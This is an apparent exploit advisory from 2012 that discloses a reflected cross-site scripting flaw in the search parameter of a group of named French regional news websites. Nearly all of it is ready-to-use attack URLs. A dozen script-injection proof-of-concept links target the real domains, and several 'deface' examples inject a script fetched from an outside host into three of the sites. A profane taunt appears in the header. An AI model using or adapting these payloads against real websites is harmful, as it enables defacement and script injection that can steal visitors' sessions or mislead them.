+-------------------------------------------------------------------------------------------------------------+
# Exploit Title  : Besancon Groupe - All website XSS (Cross Site Scripting) and deface
# Author          : Atmon3r
# Date             : 14/02/2012
# Editor           : http://www.webconfiance.com
# Perso            : Fuck your Tramway !
+-------------------------------------------------------------------------------------------------------------+


[+] Exploits

http://www.website.com/index.php?rech-site=[XSS]


[+] Poc

http://www.besac.com/index.php?rech-site="><script>alert('Xss By 
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
http://www.fczoom.fr/index.php?rech-site="><script>alert('Xss By 
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
http://www.besancon-zoom.fr/index.php?rech-site="><script>alert('Xss By 
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
http://www.montbeliard-zoom.fr/index.php?rech-site="><script>alert('Xss 
By Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
http://www.pontarlier-zoom.fr/index.php?rech-site="><script>alert('Xss 
By Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
http://www.lons-zoom.fr/index.php?rech-site="><script>alert('Xss By 
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
http://www.dole-zoom.fr/index.php?rech-site="><script>alert('Xss By 
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
http://www.champagnole-zoom.fr/index.php?rech-site="><script>alert('Xss 
By Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
http://www.vesoul-zoom.fr/index.php?rech-site="><script>alert('Xss By 
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
http://www.gray-zoom.fr/index.php?rech-site="><script>alert('Xss By 
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
http://www.luxeuil-zoom.fr/index.php?rech-site="><script>alert('Xss By 
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher
http://www.belfort-zoom.fr/index.php?rech-site="><script>alert('Xss By 
Atm0n3r')</script>&submit.x=14&submit.y=9&act=rechercher

[+] Other

All page can be xssed defaced

Exemples:

http://www.besac.com/index.php?rech-site=/"><script 
type="text/javascript" 
src="http://vuln.xssed.net/thirdparty/scripts/ckers.org.js"></script>&submit.x=14&submit.y=9&act=rechercher
http://www.fczoom.fr/index.php?rech-site=/"><script 
type="text/javascript" 
src="http://vuln.xssed.net/thirdparty/scripts/ckers.org.js"></script>&submit.x=14&submit.y=9&act=rechercher
http://www.besancon-zoom.fr/index.php?rech-site=/"><script 
type="text/javascript" 
src="http://vuln.xssed.net/thirdparty/scripts/ckers.org.js"></script>&submit.x=14&submit.y=9&act=rechercher

# The End //